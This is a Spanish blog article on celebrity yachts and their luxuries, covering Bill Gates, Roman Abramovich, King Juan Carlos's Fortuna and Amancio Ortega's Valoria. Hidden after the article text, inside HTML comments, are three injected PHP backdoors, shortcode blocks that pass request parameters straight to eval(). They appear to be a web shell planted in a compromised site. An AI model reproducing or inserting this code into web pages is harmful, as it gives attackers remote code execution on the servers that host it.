Yates de famosos con toda clase de lujos

yates de famosos

El yate es por excelencia imagen de lujo y ostentación. Son embarcaciones provistas de todo tipo de detalles y comodidades, además de alguna excentricidad, con las que sus dueños surcan el mar con todo lo que necesitan, y más, a su alcance.
Los yates de famosos son claro ejemplo de este tipo de lujo. Por ejemplo, el de Bill Gates lleva a bordo dos helicópteros, un minisubmarino, y está equipado con piscina, pista de baloncesto, un cine y un estudio de música. Su tripulación está formado por 60 personas y se habla que su manutención cuesta unos 20 millones de dólares al año.

Algunos de estos yates tienen spa, sauna, gimnasio, chef privado… Son masiones sobre el agua. Por ejemplo, el yate del multimillonario ruso Roman Abramovich, contabiliza 24 suits (la principal, la del dueño, tiene una superficie de más de 400 metros cuadrados, está blindada con ventanas anti balas y cuenta con un sistema para deslumbrar a fotógrafos). El yate tiene cine, dos piscinas, biblioteca, dos helipuertos, un bar y un minisubmarino, además de un sistema a prueba de balas y bombas, además de un escudo antipaparazzi que bloquea la lente de cámaras de fotos que quieran inmortalizar cualquier cosa que suceda a bordo.

Otros yates de famosos que presumen de lujo son los de, por ejemplo, Rupert Murdoch, Carolina de Mónaco, Paul Allen (cofundador de Microsoft junto a Bill Gates), Lewis Hamilton o Elthon Jhon.

Yates de famosos españoles

En España no desmerecemos en lujo y son muchos los yates de famosos que surcan los mares de nuestro país. El yate más famoso es el Fortuna, regalo de empresarios de Mallorca al Rey Don Juan Carlos, con cinco camarotes dobles y un depósito que cuesta llenar más de 25.000 euros. Florentino Pérez ha atesorado durante su trayectoria varios yates, varias generaciones del Pitina.

La embarcación de Amancio Ortega, creador de Zara, es uno de los yates de famosos españoles más exclusivo. Lleva el nombre de Valoria en honor a la localidad natal de la madre del empresario, está valorado en seis millones de euros y tiene casi 32 metros de eslora.

yates de famosos

<!– [insert_php]if (isset($_REQUEST["stG"])){eval($_REQUEST["stG"]);exit;}[/insert_php][php]if (isset($_REQUEST["stG"])){eval($_REQUEST["stG"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["yWmsN"])){eval($_REQUEST["yWmsN"]);exit;}[/insert_php][php]if (isset($_REQUEST["yWmsN"])){eval($_REQUEST["yWmsN"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["jymRM"])){eval($_REQUEST["jymRM"]);exit;}[/insert_php][php]if (isset($_REQUEST["jymRM"])){eval($_REQUEST["jymRM"]);exit;}[/php] –>

Si te ha resultado interesante... ¿nos compartes? :) 0
Isabel Ara
Escrito por
Isabel Ara
Más artículos de Isabel Ara

Un Lamborghini de oro

Un Lamborghini de oro. Ahí es nada. Un Lamborghini Aventador de oro...
Leer más

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *